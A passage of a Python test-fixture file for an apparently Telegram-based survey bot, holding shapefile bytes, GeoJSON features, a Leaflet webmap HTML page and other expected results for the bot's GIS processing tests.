'dbf': b'\x03y\x0b\x16\x02\x00\x00\x00a\x01\xf5\x01\x00\x00\x00\x00'
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'ID\x00\x00\x00\x00\x00\x00\x00\x00\x00C\x00\x00\x00\x002\x00\x00\x00'
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00USER_NAME\x00\x00C'
b'\x00\x00\x00\x002\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00\x00SURVEY\x00\x00\x00\x00\x00C\x00\x00\x00\x00'
b'2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00TIME'
b'\x00\x00\x00\x00\x00\x00\x00C\x00\x00\x00\x002\x00\x00\x00'
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00PHOTO\x00\x00\x00'
b'\x00\x00\x00C\x00\x00\x00\x002\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00\x00\x00\x00\x00\x00VIDEO\x00\x00\x00\x00\x00\x00C'
b'\x00\x00\x00\x002\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00\x00QUEST_1\x00\x00\x00\x00C\x00\x00\x00\x002\x00\x00\x00'
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00ANS_1\x00\x00\x00'
b'\x00\x00\x00C\x00\x00\x00\x002\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00\x00\x00\x00\x00\x00QUEST_2\x00\x00\x00\x00C'
b'\x00\x00\x00\x002\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00\x00ANS_2\x00\x00\x00\x00\x00\x00C\x00\x00\x00\x00'
b'2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\r 39'
b' Name54 '
b' survey53 '
b' 20-Nov-2021 22:45:00 https:'
b'//telegra.ph/test_path_photo54 https://telegra.ph/test_'
b'path_video54 question53_1 '
b' answer54_1 question53'
b'_2 answer54_2 '
b' 40 '
b' Name55 survey53 '
b' 20-Nov-2021 22:45:00 '
b' https://telegra.ph/test_path_photo55 '
b' https://telegra.ph/test_path_video55 question53_1 '
b' answer55_1 '
b' question53_2 ans'
b'wer55_2 ',
'shp': b"\x00\x00'\n\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xaa\xe8\x03\x00\x00'
b'\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00D\xc0\x00\x00\x00\x00'
b'\x00\x00>\xc0\x00\x00\x00\x00\x00\x80Q@\x00\x00\x00\x00\x00\x00>@'
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00\x01\x00\x00\x008\x05\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00>\xc0\x00\x00\x00\x00\x00\x00>\xc0\x00\x00\x00\x00\x00\x00>@'
b'\x00\x00\x00\x00\x00\x00>@\x01\x00\x00\x00\x04\x00\x00\x00'
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00>@\x00\x00\x00\x00\x00\x00>@'
b'\x00\x00\x00\x00\x00\x00>\xc0\x00\x00\x00\x00\x00\x00>\xc0'
b'\x00\x00\x00\x00\x00\x00$@\x00\x00\x00\x00\x00\x004@\x00\x00\x00\x00'
b'\x00\x00>@\x00\x00\x00\x00\x00\x00>@\x00\x00\x00\x02\x00\x00\x008'
b'\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00D\xc0\x00\x00\x00\x00'
b'\x00\x00$\xc0\x00\x00\x00\x00\x00\x80Q@\x00\x00\x00\x00\x00\x004@'
b'\x01\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00D@\x00\x00\x00\x00\x00\x00$@\x00\x00\x00\x00\x00\x00D\xc0'
b'\x00\x00\x00\x00\x00\x00$\xc0\x00\x00\x00\x00\x00\x80Q@'
b'\x00\x00\x00\x00\x00\x004@\x00\x00\x00\x00\x00\x00D@\x00\x00\x00\x00'
b'\x00\x00$@',
'shx': b"\x00\x00'\n\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00:\xe8\x03\x00\x00'
b'\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00D\xc0\x00\x00\x00\x00'
b'\x00\x00>\xc0\x00\x00\x00\x00\x00\x80Q@\x00\x00\x00\x00\x00\x00>@'
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x002\x00\x00\x008\x00\x00\x00n\x00\x00\x008'}
class Result:
"""Container with the result data for the comparison
in test_process.py"""
num = 0
@property
def result_ques_ans(self):
return {'question': [(f'question{self.num}_1',), (f'question{self.num}_2',)],
'answer': [(f'answer{self.num}_1',), (f'answer{self.num}_2',),
(f'answer{self.num}_1',), (f'answer{self.num}_2',),
(f'answer{self.num + 1}_1',), (f'answer{self.num + 1}_2',),
(f'answer{self.num + 2}_1',), (f'answer{self.num + 2}_2',)],
'count': 2}
@property
def result_save_survey(self):
return [None, f'survey{self.num}`', f'survey{self.num}`survey{self.num}`',
f'survey{self.num}`survey{self.num}`survey{self.num}`']
@property
def result_credentials(self):
return {'NAME': 'test_db', 'USER': 'bot', 'PASSWORD': '1234', 'HOST': 'localhost', 'PORT': '5432'}
@property
def result_states(self):
return {'INIT': 1, 'SURVEY1': 2, 'SURVEY2': 3, 'SURVEY3': 4, 'COLLECT': 5, 'POINT': 6, 'POLYGON': 7,
'TRANSIT': 8, 'MEDIA1': 9, 'MEDIA2': 10, 'QUESTION1': 11, 'QUESTION2': 12, 'ANSWER': 13, 'CHECK1': 14,
'CHECK2': 15, 'SUBMIT': 16, 'RESULT': 17}
@property
def result_point(self):
return [45.0, 45.0]
@property
def result_polygon(self):
return [[46.0, 45.0], [47.0, 46.0], [48.0, 47.0], [45.0, 48.0], [46.0, 45.0]]
@property
def result_count(self):
return 2
@property
def result_get_q_count(self):
return 29
@property
def result_set_ans_check(self):
return 1
@property
def result_ans_check(self):
return [1, 'null']
@property
def result_answer_insert(self):
return [[2, 3], [('answer17`_1',), ('answer17`_2',), ('answer17`_3',)]]
@property
def result_get_pp(self):
return '54.0 54.0, 45.0 46.0, 50.0 56.0'
@property
def result_append_pp(self):
return ['54.0 54.0,58.0 48.0', '58.0 48.0']
@property
def result_get_count(self):
return [3, 0]
@property
def result_point_manual(self):
return ('POINT(179 -89)', datetime.datetime.now().strftime("%Y"))
@property
def result_polygon_create(self):
return ("POLYGON((54.35 54,45 46,50 56,54.35 54))", datetime.datetime.now().strftime("%Y"))
@property
def result_save_media(self):
return 'https://telegra.ph/test_path'
@property
def result_media_path(self):
return 'https://telegra.ph/test_path'
@property
def result_extent(self):
return {'point': 'BOX(-45 -45,45 45)', 'polygon': 'BOX(-40 -30,70 30)'}
@property
def result_triple_map_center(self):
return [{'center_long': 12.5, 'center_lat': 0.0, 'point1_long': -45.0, 'point1_lat': -45.0, 'point2_long': 70.0,
'point2_lat': 45.0},
{'center_long': 0.0, 'center_lat': 0.0, 'point1_long': -45.0, 'point1_lat': -45.0, 'point2_long': 45.0,
'point2_lat': 45.0},
{'center_long': 15.0, 'center_lat': 0.0, 'point1_long': -40.0, 'point1_lat': -30.0, 'point2_long': 70.0,
'point2_lat': 30.0}]
@property
def result_distance(self):
return [15038278, 13324945, 13389850]
@property
def result_get_scale(self):
return [19, 6, 1]
@property
def result_gjson_shp(self):
return [[572000, 371], [372, 573000]]
@property
def result_source_webmap(self):
return {'point': {'crs': {'properties': {'name': 'urn:ogc:def:crs:OGC:1.3:CRS84'},
'type': 'name'},
'features': [{'geometry': {'coordinates': [45.0, 45.0],
'type': 'Point'},
'properties': {'photo': '<a '
'href="https://telegra.ph/test_path_photo26"><img '
'id="Pic" '
'src="https://telegra.ph/test_path_photo26"></a>',
'question': '<br>question26_1: '
'answer26_1<br>question26_2: '
'answer26_2<br>',
'time': '2021-11-20 22:45:00',
'user': 'Name26',
'video': '<a '
'href="https://telegra.ph/test_path_video26">Click '
'the link.</a>'},
'type': 'Feature'},
{'geometry': {'coordinates': [-45.0, -45.0],
'type': 'Point'},
'properties': {'photo': 'None',
'question': '<br>question26_1: '
'answer26_1<br>question26_2: '
'answer26_2<br>',
'time': '2021-11-20 22:45:00',
'user': 'Name26',
'video': 'None '},
'type': 'Feature'}],
'name': 'Places',
'type': 'FeatureCollection'},
'polygon': {'crs': {'properties': {'name': 'urn:ogc:def:crs:OGC:1.3:CRS84'},
'type': 'name'},
'features': [{'geometry': {'coordinates': [[[[30.0, 30.0],
[-30.0, -30.0],
[10.0, 20.0],
[30.0, 30.0]]]],
'type': 'MultiPolygon'},
'properties': {'photo': '<a '
'href="https://telegra.ph/test_path_photo27"><img '
'id="Pic" '
'src="https://telegra.ph/test_path_photo27"></a>',
'question': '<br>question26_1: '
'answer27_1<br>question26_2: '
'answer27_2<br>',
'time': '2021-11-20 22:45:00',
'user': 'Name27',
'video': '<a '
'href="https://telegra.ph/test_path_video27">Click '
'the link.</a>'},
'type': 'Feature'},
{'geometry': {'coordinates': [[[[40.0, 10.0],
[-40.0, -10.0],
[70.0, 20.0],
[40.0, 10.0]]]],
'type': 'MultiPolygon'},
'properties': {'photo': '<a '
'href="https://telegra.ph/test_path_photo28"><img '
'id="Pic" '
'src="https://telegra.ph/test_path_photo28"></a>',
'question': '<br>question26_1: '
'answer28_1<br>question26_2: '
'answer28_2<br>',
'time': '2021-11-20 22:45:00',
'user': 'Name28',
'video': '<a '
'href="https://telegra.ph/test_path_video28">Click '
'the link.</a>'},
'type': 'Feature'}],
'name': 'Places',
'type': 'FeatureCollection'}}
@property
def result_webmap(self):
return (b'<!doctype html>\n<html lang="en">\n<head>\n <link rel="stylesheet" href='
b'"https://unpkg.com/leaflet@1.7.1/dist/leaflet.css"\n integrity="'
b'sha512-xodZBNTC5n17Xt2atTPuE1HxjVMSvLVW9ocqUKLsCC5CXdbqCmblAshOMAS6/keqq/sMZ'
b'MZ19scR4PsZChSR7A=="\n crossorigin=""/>\n <style>\n body'
b'{background-color: #3d85c6;}\n #main {\n height: 84vh;\n '
b' width: 90vw;\n margin: 0;\n position: abs'
b'olute;\n top: 50%;\n left: 50%;\n -ms-tran'
b'sform: translate(-50%, -50%);\n transform: translate(-50%, -50'
b'%);\n }\n .mapid{\n height: 79vh;\n widt'
b'h: 90vw;\n }\n #Pic{\n width: 100%;\n }\n'
b' #topbar{ \n margin-left: auto;\n '
b'margin-right: auto;\n left: 0;\n right: 0;\n '
b' text-align: center; \n padding: 1px;\n color: whi'
b'te; \n }\n </style>\n <script src="https://unpkg.com'
b'/leaflet@1.7.1/dist/leaflet.js"\n integrity="sha512-XQoYMqMTK8'
b'LvdxXYG3nZ448hOEQiglfqkJs1NOQV44cWnUrBc8PkAOcXy20w0vlaXaVUearIOBhiXZ5V3ynxwA'
b'=="\n crossorigin=""></script>\n <title>Telegram bot</title>'
b'\n</head>\n<body>\n <div id = main>\n <div id="topbar"><b>Name35</b>, '
b'click an object for the popup</div>\n <div id="mapid" class="mapid"></'
b'div>\n </div> \n<script>\n "use strict"\n var Source_point ='
b" {'crs': {'properties': {'name': 'urn:ogc:def:crs:OGC:1.3:CRS84'}, 'type': '"
b"name'}, 'features': [{'geometry': {'coordinates': [45.0, 45.0], 'type': 'Poi"
b'nt\'}, \'properties\': {\'photo\': \'<a href="https://telegra.ph/test_path'
b'_photo35"><img id="Pic" src="https://telegra.ph/test_path_photo35"></a>\''
b", 'question': '<br>question35_1: answer35_1<br>question35_2: answer35_2<br>'"
b", 'time': '2021-11-20 22:45:00', 'user': 'Name35', 'video': '<a href"
b'="https://telegra.ph/test_path_video35">Click the link.</a>\'}, \'type\': \''
b"Feature'}, {'geometry': {'coordinates': [-45.0, -45.0], 'type': 'Point'}, 'p"
b"roperties': {'photo': 'None', 'question': '<br>question35_1: answer35_1<br>q"
b"uestion35_2: answer35_2<br>', 'time': '2021-11-20 22:45:00', 'user': 'Name35"
b"', 'video': 'None '}, 'type': 'Feature'}], 'name': 'Places', 'type': 'Featur"
b"eCollection'};\n var Source_polygon = {'crs': {'properties': {'name': "
b"'urn:ogc:def:crs:OGC:1.3:CRS84'}, 'type': 'name'}, 'features': [{'geometry':"
b" {'coordinates': [[[[30.0, 30.0], [-30.0, -30.0], [10.0, 20.0], [30.0, 30.0]"
b']]], \'type\': \'MultiPolygon\'}, \'properties\': {\'photo\': \'<a href="'
b'https://telegra.ph/test_path_photo36"><img id="Pic" src="https://telegra.ph/'
b'test_path_photo36"></a>\', \'question\': \'<br>question35_1: answer36_1<br>q'
b"uestion35_2: answer36_2<br>', 'time': '2021-11-20 22:45:00', 'user': 'Name36"
b'\', \'video\': \'<a href="https://telegra.ph/test_path_video36">Click the li'
b"nk.</a>'}, 'type': 'Feature'}, {'geometry': {'coordinates': [[[[40.0, 10.0],"
b" [-40.0, -10.0], [70.0, 20.0], [40.0, 10.0]]]], 'type': 'MultiPolygon'}, 'pr"
b'operties\': {\'photo\': \'<a href="https://telegra.ph/test_path_photo37"><im'
b'g id="Pic" src="https://telegra.ph/test_path_photo37"></a>\', \'question\':'
b" '<br>question35_1: answer37_1<br>question35_2: answer37_2<br>', 'time': '20"
b'21-11-20 22:45:00\', \'user\': \'Name37\', \'video\': \'<a href="https://tel'
b'egra.ph/test_path_video37">Click the link.</a>\'}, \'type\': \'Feature\'}'
b"], 'name': 'Places', 'type': 'FeatureCollection'};\n var map = L.map('"
b"mapid', {\n center: [0.000000,12.500000],\n zoom: 1\n });\n"
b" var CartoDB_Positron = L.tileLayer('https://{s}.basemaps.cartocdn.com/li"
b'ght_all/{z}/{x}/{y}{r}.png\', {\n attribution: \'© <a href="htt'
b'ps://www.openstreetmap.org/copyright">OpenStreetMap</a> contributors © '
b'\' +\n \'<a href="https://carto.com/attributions">CARTO</a>\''
b",\n subdomains: 'abcd',\n maxZoom: 19\n }).addTo(map);\n "
b" var Esri_WorldImagery = L.tileLayer('https://server.arcgisonline.com/ArcGIS"
b"/rest/services/World_Imagery/'+\n 'MapServer/tile/{z}/{y}/{x}', {\tattr"
b"ibution: 'Tiles © Esri — Source: Esri, i-cubed, USDA, USGS, AEX,'"
b"+\n 'GeoEye, Getmapping, Aerogrid, IGN, IGP, UPR-EGP, and the GIS User"
b" Community'\n });\n var Points = L.geoJSON(Source_point,{\n po"
b'intToLayer: function (feature, latlng) {\n return L.marker(lat'
b"lng, {icon: L.icon({\n iconUrl: 'https://telegra.ph/fi"
b"le/bc24c001d928ca59c469d.png',\n iconSize: [20, 20],\n "
b' iconAnchor: [10, 10],\n popupAnchor'
b': [0, -10]\n })})\n },\n onEachFeature: functi'
b'on(feature, layer) {\n layer.bindPopup(`\n <p><b>Nam'
b'e:</b> ${feature.properties.user}\n <br>\n <b>Date/T'
b'ime (non-local):</b> ${feature.properties.time}\n <br>\n '
b' <b>Question:</b> ${feature.properties.question} \n '
b' <b>Latitude:</b> <i>${feature.geometry.coordinates[1].toFixed(4)}</'
b'i>,\n <b>Longitude:</b> <i>${feature.geometry.coordinates[0].t'
b'oFixed(4)}</i>\n <br>\n <b>Video:</b> ${feature.prop'
b'erties.video} \n <br>\n <b>Photo:</b> ${fe'
b'ature.properties.photo}\n </p>`);\n }\n }).addTo(map);'
b'\n\n var Polygons = L.geoJSON(Source_polygon,\n {style: {},\n '
b' onEachFeature: function(feature, layer) {\n layer.bindPopup'
b'(`\n <p><b>Name:</b> ${feature.properties.user}\n <b'
b'r>\n <b>Date/Time (non-local):</b> ${feature.properties.time}\n'
b' <br>\n <b>Question:</b> ${feature.properties.quest'
b'ion}\n <b>Video:</b> ${feature.properties.video} \n '
b' <br>\n <b>Photo:</b> ${feature.properties.photo}\n '
b' </p>`);\n } \n }).addTo(map);\n\n var baseMaps '
b'= {\n "Map": CartoDB_Positron,\n "Imagery": Esri_WorldImager'
b'y\n };\n var vectorL = {\n "Points": Points,\n "Polygons'
b'":Polygons\n };\n L.control.layers(baseMaps,vectorL).addTo(map);\n '
b' var count = 0\n var scbr = L.control.scale({imperial:false})\n map.'
b'addEventListener("zoomend",function (){\n if (map.getZoom() > 5 &&'
b' count === 0){\n scbr.addTo(map);\n count ++;\n '
b' }\n else if (map.getZoom() <= 5) {\n scbr.remove();\n '
b' count = 0;\n }\n })\n</script>\n</body>\n</html> ')
@property
def result_gjson_point(self):
return {'check': 1,
'result': {'crs': {'properties': {'name': 'urn:ogc:def:crs:OGC:1.3:CRS84'},
'type': 'name'},
'features': [{'geometry': {'coordinates': [45.0, 45.0],
'type': 'Point'},
'properties': {'ans_1': 'answer44_1',
'ans_2': 'answer44_2',
'entr_time': '2021-11-20 22:45:00',
'id': 22,
'photo': 'https://telegra.ph/test_path_photo44',
'quest_1': 'question44_1',
'quest_2': 'question44_2',
'survey': 'survey44',
'user_name': 'Name44',
'video': 'https://telegra.ph/test_path_video44'},
'type': 'Feature'},
{'geometry': {'coordinates': [-45.0, -45.0],
'type': 'Point'},
'properties': {'ans_1': 'answer44_1',
'ans_2': 'answer44_2',
'entr_time': '2021-11-20 22:45:00',
'id': 23,
'photo': 'None',
'quest_1': 'question44_1',
'quest_2': 'question44_2',
'survey': 'survey44',
'user_name': 'Name44',
'video': 'None'},
'type': 'Feature'}],
'name': 'Places',
'type': 'FeatureCollection'}}
@property
def result_gjson_polygon(self):
return {'check': 1,
'result': {'crs': {'properties': {'name': 'urn:ogc:def:crs:OGC:1.3:CRS84'},
'type': 'name'},
'features': [{'geometry': {'coordinates': [[[[30.0, 30.0],
[-30.0, -30.0],
[10.0, 20.0],
[30.0, 30.0]]]],
'type': 'MultiPolygon'},
'properties': {'ans_1': 'answer45_1',
'ans_2': 'answer45_2',
'entr_time': '2021-11-20 22:45:00',
'id': 24,
'photo': 'https://telegra.ph/test_path_photo45',
'quest_1': 'question44_1',
'quest_2': 'question44_2',
'survey': 'survey44',
'user_name': 'Name45',
'video': 'https://telegra.ph/test_path_video45'},
'type': 'Feature'},
{'geometry': {'coordinates': [[[[40.0, 10.0],
[-40.0, -10.0],
[70.0, 20.0],
[40.0, 10.0]]]],
'type': 'MultiPolygon'},
'properties': {'ans_1': 'answer46_1',
'ans_2': 'answer46_2',
'entr_time': '2021-11-20 22:45:00',
'id': 25,
'photo': 'https://telegra.ph/test_path_photo46',
'quest_1': 'question44_1',
'quest_2': 'question44_2',
'survey': 'survey44',
'user_name': 'Name46',
'video': 'https://telegra.ph/test_path_video46'},
'type': 'Feature'}],
'name': 'Places',
'type': 'FeatureCollection'}}
@property
def result_geom_gjson_point(self):
return (b'{"crs": {"properties": {"name": "urn:ogc:def:crs:OGC:1.3:CRS84"}, "type": "n'
b'ame"}, "features": [{"geometry": {"coordinates": [45.0, 45.0], "type": "Poin'
b't"}, "properties": {"ans_1": "answer47_1", "ans_2": "answer47_2", "entr_time'
b'": "2021-11-20 22:45:00", "id": 22, "photo": "https://telegra.ph/test_path_p'
b'hoto47", "quest_1": "question47_1", "quest_2": "question47_2", "survey": "su'
b'rvey47", "user_name": "Name47", "video": "https://telegra.ph/test_path_video'
b'47"}, "type": "Feature"}, {"geometry": {"coordinates": [-45.0, -45.0], "type'
b'": "Point"}, "properties": {"ans_1": "answer47_1", "ans_2": "answer47_2", "e'
b'ntr_time": "2021-11-20 22:45:00", "id": 23, "photo": "None", "quest_1": "que'
b'stion47_1", "quest_2": "question47_2", "survey": "survey47", "user_name": "N'
b'ame47", "video": "None"}, "type": "Feature"}], "name": "Places", "type": "Fe'
b'atureCollection"}')
@property
def result_geom_gjson_polygon(self):
return (b'{"crs": {"properties": {"name": "urn:ogc:def:crs:OGC:1.3:CRS84"}, "type": "n'
b'ame"}, "features": [{"geometry": {"coordinates": [[[[30.0, 30.0], [-30.0, -3'
b'0.0], [10.0, 20.0], [30.0, 30.0]]]], "type": "MultiPolygon"}, "properties": '
b'{"ans_1": "answer48_1", "ans_2": "answer48_2", "entr_time": "2021-11-20 22:4'
b'5:00", "id": 24, "photo": "https://telegra.ph/test_path_photo48", "quest_1":'
b' "question47_1", "quest_2": "question47_2", "survey": "survey47", "user_name'
b'": "Name48", "video": "https://telegra.ph/test_path_video48"}, "type": "Feat'
b'ure"}, {"geometry": {"coordinates": [[[[40.0, 10.0], [-40.0, -10.0], [70.0, '
b'20.0], [40.0, 10.0]]]], "type": "MultiPolygon"}, "properties": {"ans_1": "an'
b'swer49_1", "ans_2": "answer49_2", "entr_time": "2021-11-20 22:45:00", "id": '
b'25, "photo": "https://telegra.ph/test_path_photo49", "quest_1": "question47_'
b'1", "quest_2": "question47_2", "survey": "survey47", "user_name": "Name49", '
b'"video": "https://telegra.ph/test_path_video49"}, "type": "Feature"}], "name'
b'": "Places", "type": "FeatureCollection"}')
@property
def result_shp_point(self):
return {'check': 1,
'dbf': b'\x00ID\x00\x00\x00\x00\x00\x00\x00\x00\x00C\x00\x00\x00\x002\x00\x00\x00'
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00USER_NAME\x00\x00C'
b'\x00\x00\x00\x002\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00\x00SURVEY\x00\x00\x00\x00\x00C\x00\x00\x00\x00'
b'2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00TIME'
b'\x00\x00\x00\x00\x00\x00\x00C\x00\x00\x00\x002\x00\x00\x00'
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00PHOTO\x00\x00\x00'
b'\x00\x00\x00C\x00\x00\x00\x002\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00\x00\x00\x00\x00\x00VIDEO\x00\x00\x00\x00\x00\x00C'
b'\x00\x00\x00\x002\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00\x00QUEST_1\x00\x00\x00\x00C\x00\x00\x00\x002\x00\x00\x00'
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00ANS_1\x00\x00\x00'
b'\x00\x00\x00C\x00\x00\x00\x002\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00\x00\x00\x00\x00\x00QUEST_2\x00\x00\x00\x00C'
b'\x00\x00\x00\x002\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00\x00ANS_2\x00\x00\x00\x00\x00\x00C\x00\x00\x00\x00'
b'2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\r 37'
b' Name50 '
b' survey50 '
b' 20-Nov-2021 22:45:00 https:'
b'//telegra.ph/test_path_photo50 https://telegra.ph/test_'
b'path_video50 question50_1 '
b' answer50_1 question50'
b'_2 answer50_2 '
b' 38 '
b' Name50 survey50 '
b' 20-Nov-2021 22:45:00 '
b' '
b' question50_1 '
b' answer50_1 '
b' question50_2 ans'
b'wer50_2 ',
'shp': b"\x00\x00'\n\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00N\xe8\x03\x00\x00'
b'\x01\x00\x00\x00\x00\x00\x00\x00\x00\x80F\xc0\x00\x00\x00\x00'
b'\x00\x80F\xc0\x00\x00\x00\x00\x00\x80F@\x00\x00\x00\x00\x00\x80F@'
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00\x01\x00\x00\x00\n\x01\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x80F@\x00\x00\x00\x00\x00\x80F@\x00\x00\x00\x02\x00\x00\x00\n'
b'\x01\x00\x00\x00\x00\x00\x00\x00\x00\x80F\xc0\x00\x00\x00\x00'
b'\x00\x80F\xc0',
'shx': b"\x00\x00'\n\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00:\xe8\x03\x00\x00'
b'\x01\x00\x00\x00\x00\x00\x00\x00\x00\x80F\xc0\x00\x00\x00\x00'
b'\x00\x80F\xc0\x00\x00\x00\x00\x00\x80F@\x00\x00\x00\x00\x00\x80F@'
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x002\x00\x00\x00\n\x00\x00\x00@\x00\x00\x00\n'}
@property
def result_shp_polygon(self):
return {'check': 1,
'dbf': b'\x00ID\x00\x00\x00\x00\x00\x00\x00\x00\x00C\x00\x00\x00\x002\x00\x00\x00'
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00USER_NAME\x00\x00C'
b'\x00\x00\x00\x002\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00\x00SURVEY\x00\x00\x00\x00\x00C\x00\x00\x00\x00'
b'2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00TIME'
b'\x00\x00\x00\x00\x00\x00\x00C\x00\x00\x00\x002\x00\x00\x00'
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00PHOTO\x00\x00\x00'
b'\x00\x00\x00C\x00\x00\x00\x002\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00\x00\x00\x00\x00\x00VIDEO\x00\x00\x00\x00\x00\x00C'
b'\x00\x00\x00\x002\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00\x00QUEST_1\x00\x00\x00\x00C\x00\x00\x00\x002\x00\x00\x00'
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00ANS_1\x00\x00\x00'
b'\x00\x00\x00C\x00\x00\x00\x002\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00\x00\x00\x00\x00\x00QUEST_2\x00\x00\x00\x00C'
b'\x00\x00\x00\x002\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00\x00ANS_2\x00\x00\x00\x00\x00\x00C\x00\x00\x00\x00'
b'2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\r 39'
b' Name51 '
b' survey50 '
b' 20-Nov-2021 22:45:00 https:'
b'//telegra.ph/test_path_photo51 https://telegra.ph/test_'
b'path_video51 question50_1 '
b' answer51_1 question50'
b'_2 answer51_2 '
b' 40 '
b' Name52 survey50 '
b' 20-Nov-2021 22:45:00 '
b' https://telegra.ph/test_path_photo52 '
b' https://telegra.ph/test_path_video52 question50_1 '
b' answer52_1 '
b' question50_2 ans'
b'wer52_2 ',
'shp': b"\x00\x00'\n\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xaa\xe8\x03\x00\x00'
b'\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00D\xc0\x00\x00\x00\x00'
b'\x00\x00>\xc0\x00\x00\x00\x00\x00\x80Q@\x00\x00\x00\x00\x00\x00>@'
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00\x01\x00\x00\x008\x05\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00>\xc0\x00\x00\x00\x00\x00\x00>\xc0\x00\x00\x00\x00\x00\x00>@'
b'\x00\x00\x00\x00\x00\x00>@\x01\x00\x00\x00\x04\x00\x00\x00'
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00>@\x00\x00\x00\x00\x00\x00>@'
b'\x00\x00\x00\x00\x00\x00>\xc0\x00\x00\x00\x00\x00\x00>\xc0'
b'\x00\x00\x00\x00\x00\x00$@\x00\x00\x00\x00\x00\x004@\x00\x00\x00\x00'
b'\x00\x00>@\x00\x00\x00\x00\x00\x00>@\x00\x00\x00\x02\x00\x00\x008'
b'\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00D\xc0\x00\x00\x00\x00'
b'\x00\x00$\xc0\x00\x00\x00\x00\x00\x80Q@\x00\x00\x00\x00\x00\x004@'
b'\x01\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00D@\x00\x00\x00\x00\x00\x00$@\x00\x00\x00\x00\x00\x00D\xc0'
b'\x00\x00\x00\x00\x00\x00$\xc0\x00\x00\x00\x00\x00\x80Q@'
b'\x00\x00\x00\x00\x00\x004@\x00\x00\x00\x00\x00\x00D@\x00\x00\x00\x00'
b'\x00\x00$@',
'shx': b"\x00\x00'\n\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00:\xe8\x03\x00\x00'
b'\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00D\xc0\x00\x00\x00\x00'
